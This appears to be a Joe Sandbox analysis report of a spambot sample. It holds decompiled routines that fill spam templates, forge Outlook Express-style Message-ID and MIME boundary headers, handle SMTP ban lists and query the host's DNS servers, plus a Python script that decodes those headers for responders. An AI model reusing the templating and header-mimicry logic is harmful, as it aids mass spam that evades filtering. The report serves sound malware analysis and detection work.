                                                                                				E0040AD08(_t94 - 0x110);
                                                                                				_t98 = _t96 - 0x184 + 0x10;
                                                                                				// 004030B5 runs gethostname/gethostbyname; on failure the literal
                                                                                				// "127.0.0.1" is used, otherwise 0040A7A3 returns the inet_ntoa() string.
                                                                                				if(E004030B5() == 0) {
                                                                                					 *((intOrPtr*)(_t94 + 0x6c)) = "127.0.0.1";
                                                                                				} else {
                                                                                					_push(_t94 - 0x90);
                                                                                					 *((intOrPtr*)(_t94 + 0x6c)) = E0040A7A3(_t47, _t47);
                                                                                				}
                                                                                				// Two calls to 0040ECA5 (presumably the sample's PRNG; its body is not shown):
                                                                                				// base = (r2 & 1) + (r1 % 14) + 11, i.e. a value in 11..25.
                                                                                				_t48 = E0040ECA5();
                                                                                				_t77 = 0xe;
                                                                                				_t50 = E0040ECA5();
                                                                                				_t92 = "%OUTLOOK_BND_";
                                                                                				 *((intOrPtr*)(_t94 + 0x70)) = (_t50 & 0x00000001) + _t48 % _t77 + 0xb;
                                                                                				// Template substitution loop. 0040EE95 appears to locate the next
                                                                                				// "%OUTLOOK_BND_<n>" placeholder in the message template at _t94+0x7c
                                                                                				// (0 when none is left); 0040EDAC parses <n> after the 13-byte prefix.
                                                                                				_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                				while(1) {
                                                                                					_t103 = _t53;
                                                                                					if(_t53 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					_t55 = E0040EDAC(_t53 + 0xd);
                                                                                					_t81 =  *((intOrPtr*)(_t94 + 0x70)) + _t55;
                                                                                					__eflags = _t81;
                                                                                					 *((intOrPtr*)(_t94 + 0x60)) = _t55;
                                                                                					// MIME boundary in Outlook Express style: index, base+index, then the
                                                                                					// FILETIME as HIGH.LOW in upper-case hex.
                                                                                					wsprintfA(_t94 - 0x70, "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX", _t55, _t81,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64));
                                                                                					wsprintfA(_t94 + 0x10, "%s%d", _t92,  *((intOrPtr*)(_t94 + 0x60)));
                                                                                					// 0040EF7C replaces "%OUTLOOK_BND_<n>" with the boundary; 0x3e800 (256000)
                                                                                					// is the template buffer size passed to every replacement call.
                                                                                					E0040EF7C(__eflags,  *((intOrPtr*)(_t94 + 0x7c)), _t94 + 0x10, _t94 - 0x70, 0x3e800, 0);
                                                                                					_t98 = _t98 + 0x40;
                                                                                					_t53 = E0040EE95( *((intOrPtr*)(_t94 + 0x7c)), _t92);
                                                                                				}
                                                                                				// Message-ID in Outlook Express style: base+3, the same FILETIME as HIGH$LOW
                                                                                				// in lower-case hex, the 32-bit value stored at +0x6c (as decompiled, the
                                                                                				// string pointer assigned above), then "@<hostname>".
                                                                                				wsprintfA(_t94 - 0x70, "%04x%08.8lx$%08.8lx$%08x@%s",  *((intOrPtr*)(_t94 + 0x70)) + 3,  *((intOrPtr*)(_t94 + 0x68)),  *(_t94 + 0x64),  *((intOrPtr*)(_t94 + 0x6c)), _t94 - 0x110);
                                                                                				E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_MID", _t94 - 0x70, 0x3e800, 0);
                                                                                				return E0040EF7C(_t103,  *((intOrPtr*)(_t94 + 0x7c)), "%OUTLOOK_HST", _t94 - 0x110, 0x3e800, 0);
                                                                                			}

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 0040AD98
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040ADA6
                                                                                  • Part of subcall function 0040AD08: gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                  • Part of subcall function 0040AD08: lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                  • Part of subcall function 0040AD08: lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                  • Part of subcall function 004030B5: gethostname.WS2_32(?,00000080), ref: 004030D8
                                                                                  • Part of subcall function 004030B5: gethostbyname.WS2_32(?), ref: 004030E2
                                                                                • wsprintfA.USER32 ref: 0040AEA5
                                                                                  • Part of subcall function 0040A7A3: inet_ntoa.WS2_32(?), ref: 0040A7A9
                                                                                • wsprintfA.USER32 ref: 0040AE4F
                                                                                • wsprintfA.USER32 ref: 0040AE5E
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$Timewsprintf$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %04x%08.8lx$%08.8lx$%08x@%s$%OUTLOOK_BND_$%OUTLOOK_HST$%OUTLOOK_MID$%s%d$----=_NextPart_%03d_%04X_%08.8lX.%08.8lX$127.0.0.1
                                                                                • API String ID: 3631595830-1816598006
                                                                                • Opcode ID: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                • Instruction ID: 6edd35ca6b9ca9df7a5a601651cb978d50ba63929d11386258719776c0551fa5
                                                                                • Opcode Fuzzy Hash: ed5774bf6ac078b224cbf22e450ca61793c1c52625b21437799b5f936851b975
                                                                                • Instruction Fuzzy Hash: 0C4123B290030CBBDF25EFA1DC45EEE3BADFF08304F14442BB915A2191E679E5548B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%
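
The format strings in the C code above fix the layout of two headers the sample writes into its spam templates: the MIME boundary carries the FILETIME as upper-case HIGH.LOW, and the Message-ID carries the same FILETIME as lower-case HIGH$LOW between a counter and a 32-bit value. Both shapes copy what Outlook Express itself emits, so on their own they are not an indicator. What the routine does give a responder is a self-consistency check, because the FILETIME in the boundary and the one in the Message-ID come from a single GetLocalTime call. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it emulates the three wsprintfA calls to produce constructed test headers (the host name, the base value standing in for the PRNG result, the 32-bit value printed with %08x and the timestamp are all made up here), then parses headers back, decodes the FILETIMEs and compares them with each other and with the Date header.

```python
"""Decode the FILETIME that the function above embeds in Message-ID and MIME
boundary headers. Added example; not code from the report or the sample."""
import re
from datetime import datetime, timedelta, timezone
from email.utils import format_datetime, parsedate_to_datetime

FILETIME_EPOCH = datetime(1601, 1, 1)  # FILETIME = 100 ns ticks since 1601-01-01


def filetime_to_datetime(high, low):
    """FILETIME {dwHighDateTime, dwLowDateTime} -> naive datetime (local time for this sample)."""
    ticks = (high << 32) | low
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt):
    """Inverse of the above, returning (dwHighDateTime, dwLowDateTime)."""
    ticks = ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10
    return (ticks >> 32) & 0xFFFFFFFF, ticks & 0xFFFFFFFF


# "%04x%08.8lx$%08.8lx$%08x@%s": counter, FILETIME high, FILETIME low, 32-bit value, host
MSGID_RE = re.compile(
    r"^<?([0-9a-f]{4})([0-9a-f]{8})\$([0-9a-f]{8})\$([0-9a-f]{8})@([^>\s]+)>?$")
# "----=_NextPart_%03d_%04X_%08.8lX.%08.8lX": index, base+index, FILETIME high, FILETIME low
BOUNDARY_RE = re.compile(
    r"^----=_NextPart_(\d{3})_([0-9A-F]{4})_([0-9A-F]{8})\.([0-9A-F]{8})$")
BOUNDARY_PARAM_RE = re.compile(r'boundary="?([^";\s]+)"?', re.IGNORECASE)


def render_headers(dt, host, base, idx=0, tail=0x0040F12C):
    """Emulate the sample's three wsprintfA calls to build constructed test headers.
    'base' stands in for the PRNG-derived value (11..25 in the decompiled arithmetic);
    'tail' is a made-up stand-in for the 32-bit value printed with %08x."""
    high, low = datetime_to_filetime(dt)
    boundary = "----=_NextPart_%03d_%04X_%08X.%08X" % (idx, base + idx, high, low)
    msgid = "<%04x%08x$%08x$%08x@%s>" % (base + 3, high, low, tail, host)
    return {
        "Message-ID": msgid,
        "Content-Type": 'multipart/alternative; boundary="%s"' % boundary,
        "Date": format_datetime(dt),
    }


def parse_message_id(value):
    m = MSGID_RE.match(value.strip())
    if not m:
        return None
    counter, high, low, tail, host = m.groups()
    return {"counter": int(counter, 16), "host": host, "tail": int(tail, 16),
            "filetime": filetime_to_datetime(int(high, 16), int(low, 16))}


def parse_boundary(value):
    m = BOUNDARY_RE.match(value.strip())
    if not m:
        return None
    idx, offset, high, low = m.groups()
    return {"index": int(idx), "offset": int(offset, 16),
            "filetime": filetime_to_datetime(int(high, 16), int(low, 16))}


def analyze(headers):
    """Cross-check the two embedded FILETIMEs against each other and the Date header.
    A mismatch (or a FILETIME far from Date) means the headers were not produced by
    this code path; a match is consistent with the sample but also with real Outlook Express."""
    mid = parse_message_id(headers.get("Message-ID", ""))
    bnd = None
    m = BOUNDARY_PARAM_RE.search(headers.get("Content-Type", ""))
    if m:
        bnd = parse_boundary(m.group(1))
    result = {"message_id": mid, "boundary": bnd, "consistent": False, "date_skew": None}
    if mid and bnd:
        result["consistent"] = mid["filetime"] == bnd["filetime"]
    if mid and headers.get("Date"):
        date = parsedate_to_datetime(headers["Date"])
        if date.tzinfo is not None:  # normalise to naive UTC for the comparison
            date = date.astimezone(timezone.utc).replace(tzinfo=None)
        # the sample used GetLocalTime, so a skew equal to the sender's UTC offset is expected
        result["date_skew"] = mid["filetime"] - date
    return result


# Constructed sample (not a captured message): headers as the function above would emit them.
SAMPLE_TIME = datetime(2023, 2, 20, 12, 0, 0)
SAMPLE_HEADERS = render_headers(SAMPLE_TIME, "mail.example.net", base=17)

if __name__ == "__main__":
    print(SAMPLE_HEADERS)
    print(analyze(SAMPLE_HEADERS))
```

Because the sample calls GetLocalTime rather than GetSystemTime, the decoded FILETIME is in the sending host's local time; a date_skew equal to a whole-hour UTC offset is therefore expected and may hint at the bot's time zone, while a skew of days, or a boundary whose FILETIME differs from the Message-ID's, says the headers were not produced by this routine.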

                                                                                C-Code - Quality: 55%
                                                                                			E00402DF2(intOrPtr _a4) {
                                                                                				void* _v8;
                                                                                				signed int _v12;
                                                                                				long _v16;
                                                                                				intOrPtr _v28;
                                                                                				short _v30;
                                                                                				char _v32;
                                                                                				struct HINSTANCE__* _t18;
                                                                                				void* _t22;
                                                                                				signed int _t23;
                                                                                				short _t27;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t35;
                                                                                				intOrPtr* _t37;
                                                                                				CHAR* _t38;
                                                                                				void* _t40;
                                                                                
                                                                                				// Resolve GetNetworkParams from iphlpapi.dll at run time (no import entry).
                                                                                				_t38 = "iphlpapi.dll";
                                                                                				_t18 = GetModuleHandleA(_t38);
                                                                                				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                					_t18 = LoadLibraryA(_t38);
                                                                                				}
                                                                                				if(_t18 == 0 || _t18 == 0xffffffff) {
                                                                                					L18:
                                                                                					return 0;
                                                                                				} else {
                                                                                					_t35 = GetProcAddress(_t18, "GetNetworkParams");
                                                                                					if(_t35 == 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					// GetNetworkParams(FIXED_INFO* buf, ULONG* len) with a 0x4000-byte heap
                                                                                					// buffer; any non-zero return bails out via L18 without freeing the buffer.
                                                                                					_t22 = HeapAlloc(GetProcessHeap(), 0, 0x4000);
                                                                                					_t33 =  &_v16;
                                                                                					_v8 = _t22;
                                                                                					_v16 = 0x4000;
                                                                                					_t23 =  *_t35(_t22,  &_v16);
                                                                                					if(_t23 != 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					_v12 = _v12 & _t23;   // _t23 == 0 here: clears the result variable
                                                                                					// buf + 0x10c is FIXED_INFO.DnsServerList (after HostName[132], DomainName[132]
                                                                                					// and the CurrentDnsServer pointer): an IP_ADDR_STRING linked list of the
                                                                                					// host's configured DNS servers.
                                                                                					_t37 = _v8 + 0x10c;
                                                                                					if(_t37 == 0) {
                                                                                						L17:
                                                                                						HeapFree(GetProcessHeap(), 0, _v8);
                                                                                						return _v12;
                                                                                					} else {
                                                                                						goto L8;
                                                                                					}
                                                                                					do {
                                                                                						L8:
                                                                                						// node + 4 is IP_ADDR_STRING.IpAddress.String (the field after Next)
                                                                                						_t40 = _t37 + 4;
                                                                                						if(_t40 == 0) {
                                                                                							goto L16;
                                                                                						}
                                                                                						// Build a sockaddr_in at _v32 for this server: sin_family = AF_INET (2),
                                                                                						// sin_port = htons(0x35) = 53, sin_addr = inet_addr(string).
                                                                                						// ws2_32 ordinals: #9 = htons, #11 = inet_addr, #52 = gethostbyname.
                                                                                						// The decompiler does not track the return values of these ordinal
                                                                                						// calls, so _t27 below stands for eax after each call.
                                                                                						_t27 = 2;
                                                                                						_v32 = _t27;
                                                                                						__imp__#9(0x35);
                                                                                						_v30 = _t27;
                                                                                						__imp__#11(_t40);
                                                                                						_v28 = _t27;
                                                                                						// inet_addr() gave 0 or INADDR_NONE (0xffffffff): fall back to
                                                                                						// gethostbyname() and take h_addr_list[0] (h_addr_list is at hostent+0xc).
                                                                                						if(_t27 == 0 || _t27 == 0xffffffff) {
                                                                                							__imp__#52(_t40);
                                                                                							if(_t27 == 0) {
                                                                                								goto L16;
                                                                                							}
                                                                                							_t27 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t27 + 0xc))))));
                                                                                							_v28 = _t27;
                                                                                							goto L13;
                                                                                						} else {
                                                                                							L13:
                                                                                							if(_t27 != 0 && _t27 != 0xffffffff) {
                                                                                								_t31 = E00402CEB(_t33,  &_v32, _a4);
                                                                                								_pop(_t33);
                                                                                								_v12 = _t31;
                                                                                								if(_t31 != 0) {
                                                                                									goto L17;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                						L16:
                                                                                						_t37 =  *_t37;
                                                                                					} while (_t37 != 0);
                                                                                					goto L17;
                                                                                				}
                                                                                 			}

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(iphlpapi.dll,74D0EA30,?,000DBBA0,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E01
                                                                                • LoadLibraryA.KERNEL32(iphlpapi.dll,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E11
                                                                                • GetProcAddress.KERNEL32(00000000,GetNetworkParams), ref: 00402E2E
                                                                                • GetProcessHeap.KERNEL32(00000000,00004000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4C
                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402E4F
                                                                                • htons.WS2_32(00000035), ref: 00402E88
                                                                                • inet_addr.WS2_32(?), ref: 00402E93
                                                                                • gethostbyname.WS2_32(?), ref: 00402EA6
                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE3
                                                                                • HeapFree.KERNEL32(00000000,?,00000000,00402F0F,?,004020FF,00412000), ref: 00402EE6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$Process$AddressAllocFreeHandleLibraryLoadModuleProcgethostbynamehtonsinet_addr
                                                                                • String ID: GetNetworkParams$iphlpapi.dll
                                                                                • API String ID: 929413710-2099955842
                                                                                • Opcode ID: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction ID: af9ac6d56ee620c8fffc4a8d4b95bbdbc136fdcf8554a1f3230d1ae4f4a52a91
                                                                                • Opcode Fuzzy Hash: ac765a0f8383a0e22933114e4494c8504a9546d168c54e12ec6921eb1cd39c15
                                                                                • Instruction Fuzzy Hash: E3318131A40209ABDB119BB8DD4CAAF7778AF04361F144136F914F72D0DBB8D9819B9C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?), ref: 020895A7
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 020895D5
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 020895DC
                                                                                • wsprintfA.USER32 ref: 02089635
                                                                                • wsprintfA.USER32 ref: 02089673
                                                                                • wsprintfA.USER32 ref: 020896F4
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,00000000,?,?,00000000,00000101,?), ref: 02089758
                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 0208978D
                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 020897D8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2080000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                • String ID: PromptOnSecureDesktop
                                                                                • API String ID: 3696105349-2980165447
                                                                                • Opcode ID: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction ID: cf705b4b29ca613301a914b21dd331f4687792861186729152480d747dd54c34
                                                                                • Opcode Fuzzy Hash: 89aa5840b5586853db62f78257fc906492577e08c78806003ca7e8badc55e1ba
                                                                                • Instruction Fuzzy Hash: ADA159B190034CEFEB21EFA1CC85FEF3BADAB04341F104026FA55A6251E7B595849FA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 98%
                                                                                			E0040BE31(signed int _a4, intOrPtr _a8) {
                                                                                				signed int _v8;
                                                                                				CHAR* _v12;
                                                                                				int _v16;
                                                                                				int _t50;
                                                                                				int _t51;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t57;
                                                                                				void* _t59;
                                                                                				char* _t66;
                                                                                				CHAR* _t68;
                                                                                				int _t71;
                                                                                				int _t72;
                                                                                				void* _t76;
                                                                                				intOrPtr _t78;
                                                                                				signed int _t82;
                                                                                				signed int _t83;
                                                                                				signed int _t84;
                                                                                				intOrPtr* _t86;
                                                                                				void* _t88;
                                                                                				void* _t91;
                                                                                				void* _t92;
                                                                                
                                                                                				_t83 = _a4;
                                                                                				_t68 = _t83 + 4;
                                                                                				_v12 = _t68;
                                                                                				if(lstrcmpiA(_t68, "smtp_herr") == 0 || lstrcmpiA(_t68, "smtp_ban") == 0) {
                                                                                					L3:
                                                                                					_t72 = 0;
                                                                                					_v16 = 0;
                                                                                					if(_a8 == 3) {
                                                                                						L25:
                                                                                						if(lstrcmpiA(_v12, "smtp_herr") != 0) {
                                                                                							if(lstrcmpiA(_v12, "smtp_ban") != 0) {
                                                                                								_t50 = lstrcmpiA(_v12, "smtp_retr");
                                                                                								_t51 = 0x413638;
                                                                                								if(_t50 != 0) {
                                                                                									_t51 = _a4;
                                                                                								}
                                                                                							} else {
                                                                                								_t51 = 0x413634;
                                                                                							}
                                                                                						} else {
                                                                                							_t51 = 0x413630;
                                                                                						}
                                                                                						_t86 =  *_t51;
                                                                                						 *_t51 = _v16;
                                                                                						if(_t86 == 0) {
                                                                                							goto L36;
                                                                                						} else {
                                                                                							_t52 =  *_t86;
                                                                                							_t84 = 0;
                                                                                							while(_t52 != 0) {
                                                                                								E0040EC2E(_t52);
                                                                                								_t84 = _t84 + 1;
                                                                                								_t52 =  *((intOrPtr*)(_t86 + _t84 * 4));
                                                                                							}
                                                                                							return E0040EC2E(_t86);
                                                                                						}
                                                                                					}
                                                                                					_t55 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                					_t82 = 0;
                                                                                					if(_t55 <= 0) {
                                                                                						goto L25;
                                                                                					} else {
                                                                                						goto L5;
                                                                                					}
                                                                                					do {
                                                                                						L5:
                                                                                						if( *((char*)(_t83 + _t72 + 0x24)) == 0xa || _t72 == _t55 - 1) {
                                                                                							_t82 = _t82 + 1;
                                                                                						}
                                                                                						_t72 = _t72 + 1;
                                                                                					} while (_t72 < _t55);
                                                                                					if(_t82 == 0) {
                                                                                						goto L25;
                                                                                					}
                                                                                					_t70 = 4 + _t82 * 4;
                                                                                					_t51 = E0040EBCC(4 + _t82 * 4);
                                                                                					_pop(_t76);
                                                                                					_v16 = _t51;
                                                                                					if(_t51 == 0) {
                                                                                						goto L36;
                                                                                					}
                                                                                					E0040EE2A(_t76, _t51, 0, _t70);
                                                                                					_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                					_a4 = _a4 & 0x00000000;
                                                                                					_t92 = _t91 + 0xc;
                                                                                					if(_t57 > 0) {
                                                                                						_t71 = _v16;
                                                                                						do {
                                                                                							_t78 =  *((intOrPtr*)(_t83 + _a4 + 0x24));
                                                                                							if(_t78 == 0xa || _a4 == _t57 - 1) {
                                                                                								_t88 = _a4 - _v8;
                                                                                								if(_t78 != 0xa) {
                                                                                									_t88 = _t88 + 1;
                                                                                								}
                                                                                								_t25 = _t88 + 1; // 0x1
                                                                                								_t59 = E0040EBCC(_t25);
                                                                                								 *_t71 = _t59;
                                                                                								if(_t59 == 0) {
                                                                                									goto L25;
                                                                                								} else {
                                                                                									E0040EE08(_t59, _t83 + _v8 + 0x24, _t88);
                                                                                									_t92 = _t92 + 0xc;
                                                                                									 *((char*)(_t88 +  *_t71)) = 0;
                                                                                									if(_t88 > 0) {
                                                                                										_t31 =  *_t71 - 1; // -1
                                                                                										_t66 = _t88 + _t31;
                                                                                										if( *_t66 == 0xd) {
                                                                                											 *_t66 = 0;
                                                                                										}
                                                                                									}
                                                                                									_t71 = _t71 + 4;
                                                                                									_v8 = _v8 + _t88 + 1;
                                                                                									goto L22;
                                                                                								}
                                                                                							}
                                                                                							L22:
                                                                                							_a4 = _a4 + 1;
                                                                                							_t57 =  *((intOrPtr*)(_t83 + 0x18));
                                                                                						} while (_a4 < _t57);
                                                                                					}
                                                                                					goto L25;
                                                                                				} else {
                                                                                					_t51 = lstrcmpiA(_t68, "smtp_retr");
                                                                                					if(_t51 != 0) {
                                                                                						L36:
                                                                                						return _t51;
                                                                                					}
                                                                                					goto L3;
                                                                                				}
                                                                                			}


                                                                                APIs
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BE4F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BE5B
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BE67
                                                                                • lstrcmpiA.KERNEL32(?,smtp_herr), ref: 0040BF6A
                                                                                • lstrcmpiA.KERNEL32(?,smtp_ban), ref: 0040BF7F
                                                                                • lstrcmpiA.KERNEL32(?,smtp_retr), ref: 0040BF94
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmpi
                                                                                • String ID: 06A$46A$86A$smtp_ban$smtp_herr$smtp_retr
                                                                                • API String ID: 1586166983-142018493
                                                                                • Opcode ID: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction ID: 5eb9e18a275db8e61a6fe50fd05ed02ec51c2bbb25542f34a2f5cec7b259a8e4
                                                                                • Opcode Fuzzy Hash: 5ed1ca685c1a1102e109d808c77f40e9161e989bab58e2ccc029642cf3dec37a
                                                                                • Instruction Fuzzy Hash: 98519F71A0021AEEDB119B65DD40B9ABBA9EF04344F14407BE845FB291D738E9818FDC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 78%
                                                                                			E0040B3C5(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                				char _v132;
                                                                                				void* _t46;
                                                                                				char* _t71;
                                                                                				intOrPtr _t72;
                                                                                				intOrPtr _t73;
                                                                                				intOrPtr _t75;
                                                                                				void* _t76;
                                                                                				void* _t77;
                                                                                
                                                                                				E00405CE1(_a4, 0x3e800, _a16, 0, 0);
                                                                                				E0040EF00( &_v132, "%FROM_EMAIL");
                                                                                				E00405CE1( &_v132, 0x64, _a16, 0, 0);
                                                                                				_t71 = E0040ED03( &_v132, 0x40);
                                                                                				_t77 = _t76 + 0x38;
                                                                                				_t83 = _t71;
                                                                                				if(_t71 != 0) {
                                                                                					_t7 = _t71 + 1; // 0x1
                                                                                					E0040EF7C(_t83, _a4, "%FROM_DOMAIN", _t7, 0x3e800, 0);
                                                                                					 *_t71 = 0;
                                                                                					E0040EF7C(_t83, _a4, "%FROM_USER",  &_v132, 0x3e800, 0);
                                                                                					_t77 = _t77 + 0x28;
                                                                                				}
                                                                                				_t72 = _a12;
                                                                                				E0040EF7C(_t83, _a4, "%TO_DOMAIN",  *((intOrPtr*)(_t72 + 0xc)), 0x3e800, 0);
                                                                                				wsprintfA( &_v132, "%s@%s",  *((intOrPtr*)(_t72 + 8)),  *((intOrPtr*)(_t72 + 0xc)));
                                                                                				E0040EF7C(_t83, _a4, "%TO_EMAIL",  &_v132, 0x3e800, 0);
                                                                                				_t73 = _a4;
                                                                                				E0040EF7C(_t83, _t73, "%TO_USER",  *((intOrPtr*)(_t72 + 4)), 0x3e800, 0);
                                                                                				_t46 = E0040F0CB( &_v132);
                                                                                				_push(0);
                                                                                				_push( &_v132);
                                                                                				_push(_t46);
                                                                                				E0040F133();
                                                                                				E0040EF7C(_t83, _t73, "%TO_HASH",  &_v132, 0x3e800, 0);
                                                                                				_push(_t73);
                                                                                				E0040AD89( &_v132, _t83);
                                                                                				E0040B211(0,  &_v132, 0);
                                                                                				E0040EF7C(_t83, _t73, "%DATE",  &_v132, 0x3e800, 0);
                                                                                				E0040B211(0,  &_v132, 5);
                                                                                				E0040EF7C(_t83, _t73, "%P5DATE",  &_v132, 0x3e800, 0);
                                                                                				E0040B211(0,  &_v132, 0xfffffffb);
                                                                                				E0040EF7C(_t83, _t73, "%M5DATE",  &_v132, 0x3e800, 0);
                                                                                				_t75 = _a8;
                                                                                				 *((char*)(E0040AEDD(_t75, _t73, 0x3e800) + _t75)) = 0;
                                                                                				return _t75;
                                                                                			}


                                                                                APIs
                                                                                • wsprintfA.USER32 ref: 0040B467
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(-00000010,00000000,00000080,-00000004,-00000010), ref: 0040EF92
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(?), ref: 0040EF99
                                                                                  • Part of subcall function 0040EF7C: lstrlenA.KERNEL32(00000000), ref: 0040EFA0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.289443639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.289443639.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$wsprintf
                                                                                • String ID: %DATE$%FROM_DOMAIN$%FROM_EMAIL$%FROM_USER$%M5DATE$%P5DATE$%TO_DOMAIN$%TO_EMAIL$%TO_HASH$%TO_USER$%s@%s
                                                                                • API String ID: 1220175532-2340906255
                                                                                • Opcode ID: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction ID: bf34ba3998127a8345ca8177a6a798a4e2b1dcf0281bd89f40bace4b7f612c60
                                                                                • Opcode Fuzzy Hash: f116c43b1eb536776b1bff8e0c8cac67a078ec341982f46d28ec492e3a392109
                                                                                • Instruction Fuzzy Hash: CE4174B254011D7EDF016B96CCC2DFFBB6CEF4934CB14052AF904B2181EB78A96487A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetVersionExA.KERNEL32 ref: 0208202D
                                                                                • GetSystemInfo.KERNEL32(?), ref: 0208204F
                                                                                • GetModuleHandleA.KERNEL32(00410380,0041038C), ref: 0208206A
                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02082071
                                                                                • GetCurrentProcess.KERNEL32(?), ref: 02082082
                                                                                • GetTickCount.KERNEL32 ref: 02082230
                                                                                  • Part of subcall function 02081E46: GetComputerNameA.KERNEL32(?,0000000F), ref: 02081E7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.292424042.0000000002080000.00000040.00001000.00020000.00000000.sdmp, Offset: 02080000, based on PE: false
